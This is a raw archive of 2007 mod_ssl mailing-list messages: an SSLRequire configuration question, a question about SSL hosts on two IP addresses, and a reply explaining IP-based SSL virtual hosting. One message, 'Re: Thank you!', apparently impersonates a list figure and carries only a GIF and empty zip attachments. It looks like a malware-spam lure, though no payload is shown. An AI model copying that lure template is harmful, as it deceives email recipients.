mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 22 20:41:32 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CCF7614D851; Thu, 22 Feb 2007 20:41:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 9A21E14D82F
	for ; Thu, 22 Feb 2007 20:41:32 +0100 (CET)
Received: (qmail invoked by alias); 22 Feb 2007 19:41:01 -0000
X-Provags-ID: V01U2FsdGVkX1+bT6QL0Kmbm+te3uX1D5/WzRhd39M5T0HvlWkxnA
	KGGA==
From: "osc" 
To: 
Subject: BenSSL Problem
Date: Thu, 22 Feb 2007 20:40:06 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0157_01C756C1.A33E1460"
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869
Thread-Index: AcdWuUDXyUeOx7KmRd+TqBHAxKnVRQ==
X-Y-GMX-Trusted: 0
Message-Id: <20070222194132.9A21E14D82F@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "osc" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0157_01C756C1.A33E1460
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi there,

I have a problem with the above configuration doesn't work if I uncomment
the relevant parts



SSLRequireSSL

#SSLVerifyClient      require

#SSLVerifyDepth       1

#SSLRequireSSL

#SSLOptions              +StrictRequire +FakeBasicAuth

#SSLRequire           %{SSL_CLIENT_S_DN_O}  eq "dna GmbH" and
%{SSL_CLIENT_S_DN_OU}  eq "FHH" and %{SSL_CLIENT_S_DN_CN} in {"PIA"} 



I also tried the  directive with no success.

It works on other servers. Ubuntu installation uses a separate ssl httpd
daemon. Any idea?

 


------=_NextPart_000_0157_01C756C1.A33E1460
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi
there,



I have
a problem with the above configuration doesn’t work if I uncomment =
the
relevant parts



<Location
/home/httpd/html/test>



SSLRequireSSL



#SSLVerifyClient     
require



#SSLVerifyDepth      
1



#SSLRequireSSL



#SSLOptions         &n=
bsp;   
+StrictRequire +FakeBasicAuth



#SSLRequire         &n=
bsp;
%{SSL_CLIENT_S_DN_O}  eq "dna GmbH" and
%{SSL_CLIENT_S_DN_OU}  eq "FHH" and %{SSL_CLIENT_S_DN_CN} =
in
{"PIA"} 



</Location>



I also
tried the <Directory> directive with no =
success.



It
works on other servers. Ubuntu installation uses a separate ssl httpd =
daemon.
Any idea?



 









------=_NextPart_000_0157_01C756C1.A33E1460--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 24 17:56:43 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6BF914D895; Sat, 24 Feb 2007 17:56:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 3695414D84D
	for ; Sat, 24 Feb 2007 17:56:42 +0100 (CET)
Date: Sat, 24 Feb 2007 12:09:45 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 25 15:31:41 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F21A514D889; Sun, 25 Feb 2007 15:31:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.231])
	by master.modssl.org (Postfix) with ESMTP id D913F14D82C
	for ; Sun, 25 Feb 2007 15:31:38 +0100 (CET)
Received: by nz-out-0506.google.com with SMTP id o37so1069338nzf
        for ; Sun, 25 Feb 2007 06:31:05 -0800 (PST)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=LqnCNkM1OA8D/4h1806RbagvBZa3XhUE4JRknu5Zo4RBMWAFMJBIjXAEshqCuthojw7AqC4DjzcR5SNvpFQ6kt5XpxjG0pVHBg1HluOPqvkTLxblWfTS93W17CoBlYqi6emf9kTFO3tbYEwy4HGO5dGAVIuf1Ap+o1PipJ8KfR0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=CTBS7uWne5tPRCKQdea7cNpT/kR6nUmEfIqXjDNLPiA+OBqu3+XCoL7GpMA8yR/e5h/XRYhMTVmqMeEZTyl6kUcx10BCfWPLHMtkrh46tLP/3yGEi0Zb5buaQJqwcRXNh1mQgSTTZi99rjfom1fssXACNb6Sgl8DWO2iL9xxW8Q=
Received: by 10.114.78.1 with SMTP id a1mr577844wab.1172413865482;
        Sun, 25 Feb 2007 06:31:05 -0800 (PST)
Received: by 10.114.80.13 with HTTP; Sun, 25 Feb 2007 06:31:05 -0800 (PST)
Message-ID: 
Date: Sun, 25 Feb 2007 15:31:05 +0100
From: "Julius Thyssen" 
To: modssl-users@modssl.org
Subject: More SSL hosts in one ssl.conf
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Julius Thyssen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

HI,

I have a VPS listening to 2 different public IP-adresses.
For ALL http and a https virtual host requests it currently listens to only 1 IP

The  ssl.conf  therefore has

     Listen xxx.xxx.xxx.xx1:443
     Listen xxx.xxx.xxx.xx1:81

     

in it.  And  httpd.conf  therefore has

     Listen xxx.xxx.xxx.xx1:80

     NameVirtualHost *:80

     

I'd like to run another SSL host, on the other IP-address, mainly
because I want to use a different name and document root for it.
This host has a name not existing for the other IP-hosts, and
the new/extra host needs only SSL, and will not need a port 80 one,
although auto-rewrite to the https would be nice for it.
(I have this for the existing hosts and aliases, so I know how to do that.)

How does one best accomplish this?

I've looked really hard, but could not find info on this,
my guess is not many servers *can* listen to 2 different IPs.

I've been considering to construct something where a different
document root would be used with a certain name request, through rewrite,
and then the other hostname would be an alias of the main ones,
but that seemed overly complex since I do have the other IP I can use.

Thanks in advance for any advice on this.


Julius
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 25 18:09:37 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A4AA414D85F; Sun, 25 Feb 2007 18:09:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 94CF214D82C
	for ; Sun, 25 Feb 2007 18:09:36 +0100 (CET)
Received: from localhost.localdomain (84-45-209-227.no-dns-yet.enta.net [84.45.209.227])
	by mail.ukfsn.org (Postfix) with ESMTP id 04070E6DFD
	for ; Sun, 25 Feb 2007 17:08:58 +0000 (GMT)
Received: from [192.168.0.15] (helo=kermit.wd21.co.uk)
	by localhost.localdomain with esmtp (Exim 3.36 #1 (Debian))
	id 1HLMee-0006Lg-00
	for ; Sun, 25 Feb 2007 16:55:20 +0000
Subject: Re: More SSL hosts in one ssl.conf
From: Michael Pacey 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Date: Sun, 25 Feb 2007 17:08:53 +0000
Message-Id: <1172423333.3284.30.camel@kermit.wd21.co.uk>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.3 
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 2007-02-25 at 15:31 +0100, Julius Thyssen wrote:
> HI,
> 
> I have a VPS listening to 2 different public IP-adresses.
> For ALL http and a https virtual host requests it currently listens to only 1 IP
> 
> The  ssl.conf  therefore has
> 
>      Listen xxx.xxx.xxx.xx1:443
>      Listen xxx.xxx.xxx.xx1:81
> 
>      
> 
> in it.  And  httpd.conf  therefore has
> 
>      Listen xxx.xxx.xxx.xx1:80
> 
>      NameVirtualHost *:80
> 
>      
> 
> I'd like to run another SSL host, on the other IP-address, mainly
> because I want to use a different name and document root for it.
> This host has a name not existing for the other IP-hosts, and
> the new/extra host needs only SSL, and will not need a port 80 one,
> although auto-rewrite to the https would be nice for it.
> (I have this for the existing hosts and aliases, so I know how to do that.)
> 
> How does one best accomplish this?
> 

By configuring the new IP address to the machine, adding a Listen
directive for the new IP address and port (443), and adding a new
virtual host for that IP address and port. A rewrite or redirect from
http to https must be handled within a non-SSL virtual host so you would
need to create another virtual host for the new IP address on port 80
and have the appropriate directives within that.

> I've looked really hard, but could not find info on this,
> my guess is not many servers *can* listen to 2 different IPs.

Apache can and it is very common.

> I've been considering to construct something where a different
> document root would be used with a certain name request, through rewrite,
> and then the other hostname would be an alias of the main ones,
> but that seemed overly complex since I do have the other IP I can use.

Don't really understand what you're getting at here... if you mean using
name based virtual hosting with SSL, you can't do that because Apache
selects the appropriate NBVH by looking at the Host header, but it can't
see the Host header until it's decrypted the SSL traffic, and it can't
decrypt the SSL traffic until it knows what SSL key to use, and it only
knows that once it knows which virtual host to use because that's where
it's configured. And it can't tell which virtual host to use until it
reads the Host header. This is in the FAQ.

> Thanks in advance for any advice on this.
> 
> 
> Julius
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 25 18:40:22 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6B36414D85F; Sun, 25 Feb 2007 18:40:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0506.google.com (nz-out-0506.google.com [64.233.162.239])
	by master.modssl.org (Postfix) with ESMTP id DC95B14D82C
